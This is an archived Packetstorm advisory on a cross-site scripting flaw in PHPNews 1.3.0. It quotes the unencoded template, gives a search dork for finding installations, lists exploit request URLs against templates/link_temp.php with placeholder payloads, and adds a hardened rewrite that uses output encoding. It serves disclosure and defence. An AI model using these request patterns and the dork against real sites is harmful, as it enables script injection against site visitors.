phpnews130-xss.txt

2006-12-06T00:00:00
ID PACKETSTORM:52740
Type packetstorm
Reporter Detefix
Modified 2006-12-06T00:00:00

Description

                                        
PHP Script: PHPNews 1.3.0  
Class: XSS  
Website: http://newsphp.sourceforge.net  
Found by: Detefix  
dork: inurl:phpnews  
  
-----  
  
- Vulnerable Code:  
  
<?php  
// $url, $id, $subject, $username and $time are printed without any output encoding  
print<<<EOT  
<a href="$url?action=fullnews&showcomments=1&id=$id">$subject</a> by $username on $time<br />  
EOT;  
  
-----  
  
- Exploits:  
  
http://[target]/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS]  
http://[target]/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS]  
http://[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS]  
http://[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS]  
http://[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]  
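
- Hardened form (added example, not part of the original advisory and not PHPNews code):

The template prints five variables with no output encoding, and the URLs above show request parameters reaching them when the file is requested directly (as happens with register_globals enabled). The hypothetical render_news_link() below takes its values as arguments instead, validates the base URL and id, and HTML-encodes every field; the function name, array keys and sample values are assumptions.

```php
<?php
// Added example, not PHPNews code. render_news_link() and its array keys
// are hypothetical names chosen for this illustration.

// Encode a value for HTML text and quoted-attribute contexts.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Build the link from values passed in explicitly by the application, so the
// template never reads variables that a request could have populated.
function render_news_link(string $baseUrl, array $item): string
{
    // The base URL must be a plain relative path or an http(s) URL.
    if (!preg_match('#\A(?:https?://[^\s"\'<>]+|[A-Za-z0-9_./-]+)\z#', $baseUrl)) {
        throw new InvalidArgumentException('unexpected base URL');
    }
    // The id must be a non-negative integer, not free text.
    $id = filter_var($item['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 0]]);
    if ($id === false) {
        throw new InvalidArgumentException('id must be an integer');
    }
    // http_build_query() URL-encodes the parameters; h() then encodes the
    // whole URL (including "&") for the href attribute.
    $href = $baseUrl . '?' . http_build_query([
        'action' => 'fullnews', 'showcomments' => 1, 'id' => $id,
    ]);
    return sprintf('<a href="%s">%s</a> by %s on %s<br />',
        h($href), h((string) $item['subject']),
        h((string) $item['username']), h((string) $item['time']));
}

// Constructed sample input: every text field carries markup.
$item = [
    'id'       => '7',
    'subject'  => '"><b>subject</b>',
    'username' => '<i>user</i>',
    'time'     => "2006-12-06 <u>'x'</u>",
];
echo render_news_link('index.php', $item), "\n";

// A non-numeric id is rejected instead of being written into the link.
try {
    render_news_link('index.php', ['id' => '">x'] + $item);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```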